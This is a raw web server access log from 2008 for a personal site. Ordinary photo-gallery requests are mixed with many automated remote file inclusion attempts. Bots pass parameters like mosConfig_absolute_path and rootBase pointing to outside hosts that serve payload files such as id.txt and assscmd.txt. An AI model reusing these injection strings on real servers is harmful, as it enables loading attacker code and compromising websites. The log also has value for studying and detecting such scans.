59.126.46.141 - - [21/Aug/2008:11:41:05 -0700] "GET /logs/access_080801.log/lostpasswd.php?env[include_prefix]=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:41:07 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-155_1.jpg HTTP/1.1" 200 409403 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:41:09 -0700] "GET /logs/access_080123.log///_theme/breadcrumb.php?rootBase=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
198.66.222.121 - - [21/Aug/2008:11:41:14 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.222.121 - - [21/Aug/2008:11:41:15 -0700] "GET /logs/access_080131.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.222.121 - - [21/Aug/2008:11:41:15 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.101.4.49 - - [21/Aug/2008:11:41:17 -0700] "GET /logs/access_080621.log/errors.php?error=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:41:17 -0700] "GET ///_theme/breadcrumb.php?rootBase=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
198.66.222.121 - - [21/Aug/2008:11:41:19 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:41:24 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-218.jpg HTTP/1.1" 200 492932 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:41:24 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-094_0.jpg HTTP/1.1" 200 283329 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:41:31 -0700] "GET /logs/access_080123.log///_theme/breadcrumb.php?rootBase=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.165.80.16 - - [21/Aug/2008:11:41:31 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:11:41:35 -0700] "GET /logs/access_080106.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
190.41.11.250 - - [21/Aug/2008:11:41:36 -0700] "GET /index2.php?x=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:11:41:36 -0700] "GET /logs/access_080804.log/index2.php?x=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:41:37 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-015_0.jpg HTTP/1.1" 200 253008 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
80.67.20.130 - - [21/Aug/2008:11:41:38 -0700] "GET /logs/access_080305.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
190.41.11.250 - - [21/Aug/2008:11:41:39 -0700] "GET /logs/index2.php?x=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.41.11.250 - - [21/Aug/2008:11:41:39 -0700] "GET /logs/access_080804.log/index2.php?x=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.10.136.249 - - [21/Aug/2008:11:41:49 -0700] "GET /logs/access_080725.log//admin/frontpage_right.php?loadadminpage=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.10.136.249 - - [21/Aug/2008:11:41:49 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.10.136.249 - - [21/Aug/2008:11:41:49 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:41:51 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-070_0.jpg HTTP/1.1" 200 202976 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:41:51 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-110_1.jpg HTTP/1.1" 200 276708 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:42:07 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-111_1.jpg HTTP/1.1" 200 410836 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:42:07 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-010_2.jpg HTTP/1.1" 200 426988 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
118.129.166.13 - - [21/Aug/2008:11:42:09 -0700] "GET /logs/access_080810.log/errors.php?error=http://roux.be/Joomla/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:11:42:09 -0700] "GET /errors.php?error=http://roux.be/Joomla/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:11:42:09 -0700] "GET /logs/errors.php?error=http://roux.be/Joomla/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.10.136.249 - - [21/Aug/2008:11:42:10 -0700] "GET /logs/access_080703.log//admin/frontpage_right.php?loadadminpage=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:11:42:19 -0700] "GET /logs/access_080424.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:42:21 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-026_1.jpg HTTP/1.1" 200 408028 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:42:22 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-041_1.jpg HTTP/1.1" 200 405226 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:42:23 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-099_0.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
208.115.34.17 - - [21/Aug/2008:11:42:31 -0700] "GET /logs/access_080812.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.115.34.17 - - [21/Aug/2008:11:42:31 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.115.34.17 - - [21/Aug/2008:11:42:31 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:42:32 -0700] "GET /logs/access_080809.log/layout/default/params.php?gConf[dir][layouts]=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:42:32 -0700] "GET /layout/default/params.php?gConf[dir][layouts]=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:42:33 -0700] "GET ///_theme/breadcrumb.php?rootBase=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:42:33 -0700] "GET /logs/layout/default/params.php?gConf[dir][layouts]=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:42:35 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-232.jpg HTTP/1.1" 200 349706 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
208.115.34.17 - - [21/Aug/2008:11:42:35 -0700] "GET /logs/access_080625.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
72.29.68.128 - - [21/Aug/2008:11:42:44 -0700] "GET /logs/access_080802.log//index/login.php?DOCUMENT_ROOT=http://www.unitep.it/iscrizioni/include/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:42:50 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-011_2.jpg HTTP/1.1" 200 302624 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
89.111.176.64 - - [21/Aug/2008:11:43:01 -0700] "GET /logs/access_080810.log/?mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.64 - - [21/Aug/2008:11:43:02 -0700] "GET /?mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 200 9877 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.64 - - [21/Aug/2008:11:43:03 -0700] "GET /logs/?mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 200 61570 "-" "libwww-perl/5.805" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:43:06 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-044_1.jpg HTTP/1.1" 200 262098 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:43:08 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-104_0.jpg HTTP/1.1" 200 566260 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:43:12 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9942 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.64 - - [21/Aug/2008:11:43:12 -0700] "GET /logs/access_080810.log/index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.64 - - [21/Aug/2008:11:43:13 -0700] "GET /index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 200 9915 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.64 - - [21/Aug/2008:11:43:14 -0700] "GET /logs/index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:43:22 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0136_0.jpg HTTP/1.1" 200 329003 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
211.141.87.6 - - [21/Aug/2008:11:43:25 -0700] "GET /logs/access_080703.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
119.63.193.186 - - [21/Aug/2008:11:43:26 -0700] "HEAD /retreat1/webcam/retreat1_00766.jpg HTTP/1.1" 200 0 "-" "BaiduImagespider+(+http://help.baidu.jp/system/05.html)" "www.dmulk.com"
211.141.87.6 - - [21/Aug/2008:11:43:26 -0700] "GET /?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 9928 "-" "libwww-perl/5.805" "www.dmulk.com"
119.63.193.186 - - [21/Aug/2008:11:43:27 -0700] "GET /retreat1/webcam/retreat1_00766.jpg HTTP/1.1" 200 49272 "-" "BaiduImagespider+(+http://help.baidu.jp/system/05.html)" "www.dmulk.com"
211.141.87.6 - - [21/Aug/2008:11:43:27 -0700] "GET /logs/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 61570 "-" "libwww-perl/5.805" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:43:35 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-110_0.jpg HTTP/1.1" 200 404496 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
118.129.166.13 - - [21/Aug/2008:11:43:36 -0700] "GET /logs/access_080703.log/errors.php?error=http://roux.be/Joomla/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:43:38 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0105.jpg HTTP/1.1" 200 405751 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
217.31.58.188 - - [21/Aug/2008:11:43:43 -0700] "GET /logs/access_080621.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:43:49 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-227.jpg HTTP/1.1" 200 468270 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:43:51 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-034_2.jpg HTTP/1.1" 200 408256 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
78.110.50.122 - - [21/Aug/2008:11:43:59 -0700] "GET /logs/access_080110.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.110.50.122 - - [21/Aug/2008:11:43:59 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.110.50.122 - - [21/Aug/2008:11:43:59 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:44:02 -0700] "GET ///_theme/breadcrumb.php?rootBase=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:44:02 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-123_0.jpg HTTP/1.1" 200 471316 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:44:05 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-240.jpg HTTP/1.1" 200 345397 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
190.30.164.230 - - [21/Aug/2008:11:44:08 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.68.128 - - [21/Aug/2008:11:44:13 -0700] "GET /logs/access_080804.log//index/login.php?DOCUMENT_ROOT=http://www.unitep.it/iscrizioni/include/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:44:15 -0700] "GET /logs/access_080810.log//?path%5Bdocroot%5D=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:44:16 -0700] "GET //?path%5Bdocroot%5D=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9899 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:44:16 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 61575 "-" "libwww-perl/5.808" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:44:29 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-167.jpg HTTP/1.1" 200 178257 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:44:31 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0034.jpg HTTP/1.1" 200 278838 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
190.30.164.230 - - [21/Aug/2008:11:44:34 -0700] "GET /logs/access_080311.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.83.18.253 - - [21/Aug/2008:11:44:37 -0700] "GET /logs/access_080616.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:44:42 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-107_1.jpg HTTP/1.1" 200 300504 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:44:43 -0700] "GET /logs/access_080219.log//?path%5Bdocroot%5D=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:44:43 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-288.jpg HTTP/1.1" 200 228613 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
190.83.18.253 - - [21/Aug/2008:11:44:44 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 200 9953 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:11:44:44 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:11:44:45 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:44:49 -0700] "GET /logs/access_080525.log///_theme/breadcrumb.php?rootBase=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
190.83.18.253 - - [21/Aug/2008:11:44:51 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:44:52 -0700] "GET ///_theme/breadcrumb.php?rootBase=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.88.192.8 - - [21/Aug/2008:11:44:53 -0700] "GET /logs/access_080626.log/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.123 - - [21/Aug/2008:11:44:54 -0700] "GET /logs/access_080110.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.123 - - [21/Aug/2008:11:44:54 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.123 - - [21/Aug/2008:11:44:55 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:44:56 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0114.jpg HTTP/1.1" 200 311673 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:44:58 -0700] "GET /logs/access_080219.log///_theme/breadcrumb.php?rootBase=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.115.34.17 - - [21/Aug/2008:11:45:00 -0700] "GET /logs/errors.php?error=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.115.34.17 - - [21/Aug/2008:11:45:01 -0700] "GET /errors.php?error=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:45:07 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-117.jpg HTTP/1.1" 200 549942 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:45:11 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-139_0.jpg HTTP/1.1" 200 344654 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
211.239.165.202 - - [21/Aug/2008:11:45:20 -0700] "GET /logs/access_080615.log//include/main.php?lang=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.165.202 - - [21/Aug/2008:11:45:20 -0700] "GET //include/main.php?lang=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.165.202 - - [21/Aug/2008:11:45:25 -0700] "GET /logs/access_080615.log//include/main.php?lang=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
